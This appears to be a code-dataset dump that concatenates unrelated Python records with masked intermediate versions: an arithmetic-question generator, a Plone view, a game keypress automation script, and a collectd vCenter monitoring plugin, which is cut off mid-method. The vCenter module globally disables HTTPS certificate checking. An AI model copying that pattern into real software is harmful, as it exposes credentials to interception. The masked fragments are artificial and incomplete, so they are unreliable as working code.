"step-3": "<mask token>\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-4": "from random import randint, shuffle\n\n\nclass Generator:\n opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']\n\n @staticmethod\n def generate(level):\n \"\"\"\n 根据 level 生成指定等级的算术题\n 0:小学;1:初中;2:高中\n \"\"\"\n \"\"\"\n 生成操作数序列以及二元运算符序列\n \"\"\"\n length = randint(0 if level else 1, 4)\n op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]\n numArr = [randint(1, 100) for i in range(length + 1)]\n \"\"\"\n 生成二元运算符的位置\n \"\"\"\n remain = 1\n position = []\n for i in range(length):\n position.append(randint(0, remain))\n remain += 1 - position[i]\n if remain > 1:\n position[-1] += remain - 1\n \"\"\"\n 生成一元运算符序列\n \"\"\"\n op1Arr = []\n if level:\n if level == 1:\n op1Arr.append(Generator.opset[randint(4, 5)])\n elif level == 2:\n op1Arr.append(Generator.opset[randint(6, 8)])\n for i in range(randint(0, level)):\n op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else\n 8)])\n shuffle(op1Arr)\n \"\"\"\n 生成后缀表达式\n \"\"\"\n expression = numArr\n offset = 2\n index = 0\n for i in range(length):\n for j in range(position[i]):\n expression.insert(i + j + offset, op2Arr[index])\n index += 1\n offset += position[i]\n for op in op1Arr:\n expression.insert(randint(1, len(expression)), op)\n\n def getPriority(item):\n \"\"\"\n 返回运算符或操作数的优先级\n 操作数:0\n 一元运算符:1\n '*'、'/':2\n '+'、'-':3\n \"\"\"\n if isinstance(item, int):\n return 0\n elif item == '+' or item == '-':\n return 3\n elif item == '*' or item == '/':\n return 2\n else:\n return 1\n \"\"\"\n 转换成中缀表达式\n stack 存储 (expression, priority)\n \"\"\"\n stack = []\n for e in expression:\n priority = getPriority(e)\n if priority == 0:\n \"\"\"\n 是一个操作数,直接入栈\n \"\"\"\n stack.append((e, 0))\n elif priority == 3:\n \"\"\"\n 是加/减运算,优先级最低,拼接后直接入栈\n \"\"\"\n item2 = stack.pop()[0]\n item1 = stack.pop()[0]\n stack.append(('%s%s%s' % (item1, e, item2), 3))\n elif priority == 2:\n \"\"\"\n 是乘/除运算,如果有加/减运算需要加括号\n \"\"\"\n item2, prio2 = stack.pop()\n if prio2 > 2:\n item2 = '(%s)' % item2\n item1, prio1 = stack.pop()\n if prio1 > 2:\n item1 = '(%s)' % item1\n stack.append(('%s%s%s' % (item1, e, item2), 2))\n elif priority == 1:\n \"\"\"\n 是一元运算,除了操作数都要加括号\n \"\"\"\n item, prio = stack.pop()\n if prio:\n item = '(%s)' % item\n if e == '²':\n stack.append(('%s%s' % (item, '²'), 1))\n else:\n stack.append(('%s%s' % (e, item), 1))\n return stack[0][0]\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""Module providing views for asset storage folder"""
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
|
normal
|
{
"blob_id": "70c20b38edb01552a8c7531b3e87a9302ffaf6c5",
"index": 5062,
"step-1": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-3": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-4": "<mask token>\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Module providing views for asset storage folder\"\"\"\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import json
import time
from keySender import PressKey,ReleaseKey,dk
config = {
"Up": "W",
"Down": "S",
"Left": "A",
"Right": "D",
"Grab": "LBRACKET",
"Drop": "RBRACKET"
}
### Commands
# Move
def Move(direction,delay=.2):
PressKey(dk[config[direction]])
time.sleep(delay) # Replace with a better condition
ReleaseKey(dk[config[direction]])
# Push/Pull
def Action(direction,pull=None):
delay = .6
# If pulling - ensure you are grabbing the right block
# I.e. 'Pull Right' needs to face left first
if pull:
delay = 1
PressKey(dk[config[pull]])
ReleaseKey(dk[config[pull]])
PressKey(dk[config["Grab"]])
PressKey(dk[config[direction]])
else:
PressKey(dk[config[direction]])
PressKey(dk[config["Grab"]])
time.sleep(delay)
ReleaseKey(dk[config[direction]])
ReleaseKey(dk[config["Grab"]])
# References for keywords in file
moveKeys = ["Up","Down","Left","Right"]
climbKeys = ["Climb Up", "Climb Down", "Climb Left", "Climb Right"]
turnKeys = ["Turn Up", "Turn Down", "Turn Left", "Turn Right"]
pullKeys = ["Pull Up", "Pull Down","Pull Left", "Pull Right"]
pushKeys = ["Push Up", "Push Down", "Push Left", "Push Right"]
# Simplify turning
inverseDirections = {
"Up": "Down",
"Down": "Up",
"Left": "Right",
"Right": "Left",
}
### Interpreter
def init(filePath):
data = json.load(open(filePath))
pushed_keys = {"Up": False, "Down": False, "Left": False, "Right": False, "Grab": False}
if data['Style'] == "Manual":
for c in data['Main']:
try:
if c in moveKeys:
Move(c)
elif c in climbKeys:
Move(c.split(" ")[1],delay=.6)
elif c in turnKeys:
Move(c.split(" ")[1],delay=.1)
elif c in pullKeys:
direction = c.split(" ")[1]
Action(direction,pull=inverseDirections[direction])
elif c in pushKeys:
Action(c.split(" ")[1])
else:
print(c+" is not recognized as a command")
print(c)
except Exception as e:
print(e)
elif data['Style'] == "Recorded":
print("Reading Recorded file")
total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']
start_time = round(time.time(),2)
print("length of recording: "+str(total_time))
while time.time() < start_time+total_time:
timer = round(time.time() - start_time,2)
for c in data['Main']:
if timer > c['Start'] and timer < c['End'] and not pushed_keys[c['State']]:
print("pressing key "+ c['State'])
PressKey(dk[config[c['State']]])
pushed_keys[c['State']] = True
elif timer == c['End'] and pushed_keys[c['State']]:
print("releasing "+c['State'])
ReleaseKey(dk[config[c['State']]])
pushed_keys[c['State']] = False
|
normal
|
{
"blob_id": "1e7789b154271eb8407a027c6ddf6c941cc69a41",
"index": 3070,
"step-1": "<mask token>\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\n<mask token>\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-3": "<mask token>\nconfig = {'Up': 'W', 'Down': 'S', 'Left': 'A', 'Right': 'D', 'Grab':\n 'LBRACKET', 'Drop': 'RBRACKET'}\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\nmoveKeys = ['Up', 'Down', 'Left', 'Right']\nclimbKeys = ['Climb Up', 'Climb Down', 'Climb Left', 'Climb Right']\nturnKeys = ['Turn Up', 'Turn Down', 'Turn Left', 'Turn Right']\npullKeys = ['Pull Up', 'Pull Down', 'Pull Left', 'Pull Right']\npushKeys = ['Push Up', 'Push Down', 'Push Left', 'Push Right']\ninverseDirections = {'Up': 'Down', 'Down': 'Up', 'Left': 'Right', 'Right':\n 'Left'}\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-4": "import json\nimport time\nfrom keySender import PressKey, ReleaseKey, dk\nconfig = {'Up': 'W', 'Down': 'S', 'Left': 'A', 'Right': 'D', 'Grab':\n 'LBRACKET', 'Drop': 'RBRACKET'}\n\n\ndef Move(direction, delay=0.2):\n PressKey(dk[config[direction]])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n\n\ndef Action(direction, pull=None):\n delay = 0.6\n if pull:\n delay = 1\n PressKey(dk[config[pull]])\n ReleaseKey(dk[config[pull]])\n PressKey(dk[config['Grab']])\n PressKey(dk[config[direction]])\n else:\n PressKey(dk[config[direction]])\n PressKey(dk[config['Grab']])\n time.sleep(delay)\n ReleaseKey(dk[config[direction]])\n ReleaseKey(dk[config['Grab']])\n\n\nmoveKeys = ['Up', 'Down', 'Left', 'Right']\nclimbKeys = ['Climb Up', 'Climb Down', 'Climb Left', 'Climb Right']\nturnKeys = ['Turn Up', 'Turn Down', 'Turn Left', 'Turn Right']\npullKeys = ['Pull Up', 'Pull Down', 'Pull Left', 'Pull Right']\npushKeys = ['Push Up', 'Push Down', 'Push Left', 'Push Right']\ninverseDirections = {'Up': 'Down', 'Down': 'Up', 'Left': 'Right', 'Right':\n 'Left'}\n\n\ndef init(filePath):\n data = json.load(open(filePath))\n pushed_keys = {'Up': False, 'Down': False, 'Left': False, 'Right': \n False, 'Grab': False}\n if data['Style'] == 'Manual':\n for c in data['Main']:\n try:\n if c in moveKeys:\n Move(c)\n elif c in climbKeys:\n Move(c.split(' ')[1], delay=0.6)\n elif c in turnKeys:\n Move(c.split(' ')[1], delay=0.1)\n elif c in pullKeys:\n direction = c.split(' ')[1]\n Action(direction, pull=inverseDirections[direction])\n elif c in pushKeys:\n Action(c.split(' ')[1])\n else:\n print(c + ' is not recognized as a command')\n print(c)\n except Exception as e:\n print(e)\n elif data['Style'] == 'Recorded':\n print('Reading Recorded file')\n total_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n start_time = round(time.time(), 2)\n print('length of recording: ' + str(total_time))\n while time.time() < start_time + total_time:\n timer = round(time.time() - start_time, 2)\n for c in data['Main']:\n if timer > c['Start'] and timer < c['End'] and not pushed_keys[\n c['State']]:\n print('pressing key ' + c['State'])\n PressKey(dk[config[c['State']]])\n pushed_keys[c['State']] = True\n elif timer == c['End'] and pushed_keys[c['State']]:\n print('releasing ' + c['State'])\n ReleaseKey(dk[config[c['State']]])\n pushed_keys[c['State']] = False\n",
"step-5": "import json\nimport time\nfrom keySender import PressKey,ReleaseKey,dk\nconfig = {\n\t\"Up\": \"W\",\n\t\"Down\": \"S\",\n\t\"Left\": \"A\",\n\t\"Right\": \"D\",\n\t\"Grab\": \"LBRACKET\",\n\t\"Drop\": \"RBRACKET\"\n}\n\n### Commands\n# Move\ndef Move(direction,delay=.2):\n\tPressKey(dk[config[direction]])\n\ttime.sleep(delay) # Replace with a better condition\n\tReleaseKey(dk[config[direction]])\n\n# Push/Pull\ndef Action(direction,pull=None):\n\tdelay = .6\n\t# If pulling - ensure you are grabbing the right block\n\t# I.e. 'Pull Right' needs to face left first\n\tif pull:\n\t\tdelay = 1\n\t\tPressKey(dk[config[pull]])\n\t\tReleaseKey(dk[config[pull]])\n\t\tPressKey(dk[config[\"Grab\"]])\n\t\tPressKey(dk[config[direction]])\n\telse:\n\t\tPressKey(dk[config[direction]])\n\t\tPressKey(dk[config[\"Grab\"]])\n\ttime.sleep(delay)\n\tReleaseKey(dk[config[direction]])\n\tReleaseKey(dk[config[\"Grab\"]])\n\n# References for keywords in file\nmoveKeys = [\"Up\",\"Down\",\"Left\",\"Right\"]\nclimbKeys = [\"Climb Up\", \"Climb Down\", \"Climb Left\", \"Climb Right\"]\nturnKeys = [\"Turn Up\", \"Turn Down\", \"Turn Left\", \"Turn Right\"]\npullKeys = [\"Pull Up\", \"Pull Down\",\"Pull Left\", \"Pull Right\"]\npushKeys = [\"Push Up\", \"Push Down\", \"Push Left\", \"Push Right\"]\n\n# Simplify turning\ninverseDirections = {\n\t\"Up\": \"Down\",\n\t\"Down\": \"Up\",\n\t\"Left\": \"Right\",\n\t\"Right\": \"Left\",\n}\n\n### Interpreter\ndef init(filePath):\n\tdata = json.load(open(filePath))\n\tpushed_keys = {\"Up\": False, \"Down\": False, \"Left\": False, \"Right\": False, \"Grab\": False}\n\tif data['Style'] == \"Manual\":\n\t\tfor c in data['Main']:\n\t\t\ttry:\n\t\t\t\tif c in moveKeys:\n\t\t\t\t\tMove(c)\n\t\t\t\telif c in climbKeys:\n\t\t\t\t\tMove(c.split(\" \")[1],delay=.6)\n\t\t\t\telif c in turnKeys:\n\t\t\t\t\tMove(c.split(\" \")[1],delay=.1)\n\t\t\t\telif c in pullKeys:\n\t\t\t\t\tdirection = c.split(\" \")[1]\n\t\t\t\t\tAction(direction,pull=inverseDirections[direction])\n\t\t\t\telif c in pushKeys:\n\t\t\t\t\tAction(c.split(\" \")[1])\n\t\t\t\telse:\n\t\t\t\t\tprint(c+\" is not recognized as a command\")\n\t\t\t\tprint(c)\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\n\telif data['Style'] == \"Recorded\":\n\t\tprint(\"Reading Recorded file\")\n\t\ttotal_time = sorted(data['Main'], key=lambda k: k['End'])[-1]['End']\n\t\tstart_time = round(time.time(),2)\n\t\tprint(\"length of recording: \"+str(total_time))\n\t\twhile time.time() < start_time+total_time:\n\t\t\ttimer = round(time.time() - start_time,2)\n\t\t\tfor c in data['Main']:\n\t\t\t\tif timer > c['Start'] and timer < c['End'] and not pushed_keys[c['State']]:\n\t\t\t\t\tprint(\"pressing key \"+ c['State'])\n\t\t\t\t\tPressKey(dk[config[c['State']]])\n\t\t\t\t\tpushed_keys[c['State']] = True\n\t\t\t\telif timer == c['End'] and pushed_keys[c['State']]:\n\t\t\t\t\tprint(\"releasing \"+c['State'])\n\t\t\t\t\tReleaseKey(dk[config[c['State']]])\n\t\t\t\t\tpushed_keys[c['State']] = False",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# collectd-vcenter - vcenter.py
#
# Author : Loic Lambiel @ exoscale
# Contributor : Josh VanderLinden
# Description : This is a collectd python module to gather stats from Vmware
# vcenter
import logging
import ssl
import time
from pysphere import VIServer
try:
import collectd
COLLECTD_ENABLED = True
except ImportError:
COLLECTD_ENABLED = False
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
MB = 1024 ** 2
HOST_STATUS = ('green', 'gray', 'yellow', 'red')
class Collector(object):
def __init__(self, vcenters, username=None, password=None,
verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {
'datastore': {},
'datacenter': {},
}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
def poll_datastore(self, server, obj, name):
"""
Gather metrics about a specific datastore.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datastore.
:param str name:
Name of the datastore.
:returns:
A dictionary with four keys: capacity, free, used, and usage. The
capacity, free, and used space are measured in megabytes while the
usage is a percentage.
"""
capacity = free = usage = 0
try:
self.log.debug('query datastore %s' % (name,))
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.capacity',
'summary.freeSpace',
], from_node=obj, obj_type='Datastore')
for ps in props:
for prop in ps.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.capacity':
capacity = pv / MB
elif pn == 'summary.freeSpace':
free = pv / MB
except:
self.log.exception('Failed to get datastore metrics')
if capacity > 0:
usage = (capacity - free) / float(capacity) * 100
return {
'capacity': capacity,
'free': free,
'used': capacity - free,
'usage': usage,
}
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
else:
if 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
# change collection behavior based on the type of group we're dealing
# with
if group_type == 'datacenter':
# find each cluster in the datacenter
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
# find each host in the datacenter or cluster
find_children = server.get_clusters
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
# initialize some metrics
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
# iterate over each child node in this object group
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
# aggregate data from each child to the top level
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
# recalculate percentages
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
# return the current metrics for this group
group_stats = {
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
child_type: child_stats,
}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name',
'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize',
'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz',
], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {
'status': status,
'cpu_total': cpu_total,
'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent,
'cpu_count': cpu_count,
'mem_total': mem_total,
'mem_usage': mem_usage,
'mem_percent': mem_percent,
'vms_total': vms_total,
'vms_running': vms_running,
'vms_stopped': vms_stopped,
}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
